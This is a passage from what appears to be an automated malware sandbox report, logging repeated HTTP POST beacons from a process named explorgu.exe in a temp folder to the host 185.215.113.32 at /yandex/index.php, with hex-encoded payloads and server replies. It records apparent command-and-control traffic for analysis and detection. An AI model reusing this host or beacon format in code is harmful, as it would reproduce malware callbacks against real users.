                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:39.167191029 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:39.167967081 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:39.409809113 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            43192.168.2.449780185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:39.762749910 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:40.011436939 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:40.013238907 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:40.262975931 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            44192.168.2.449781185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:40.621169090 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:40.867711067 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:40.869205952 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:41.118803978 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            45192.168.2.449782185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:41.474091053 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:41.713092089 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:41.713726997 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:41.958024979 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            46192.168.2.449783185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:42.325891972 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:42.575690031 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:42.576606035 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:42.831290007 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            47192.168.2.449784185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:43.186696053 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:43.433206081 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:43.433911085 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:43.685684919 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            48192.168.2.449785185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:44.043229103 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:44.288628101 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:44.289525986 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:44.540266037 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            49192.168.2.449786185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:44.905215025 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:45.151746035 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:45.154381990 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:45.407037020 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            50192.168.2.449787185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:45.760546923 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:45.997772932 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:45.999461889 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:46.241014004 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            51192.168.2.449788185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:46.582060099 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:46.819622040 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:46.820557117 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:47.061094046 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            52192.168.2.449789185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:47.411578894 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:47.658549070 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:47.659321070 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:47.902012110 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            53192.168.2.449790185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:48.262770891 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
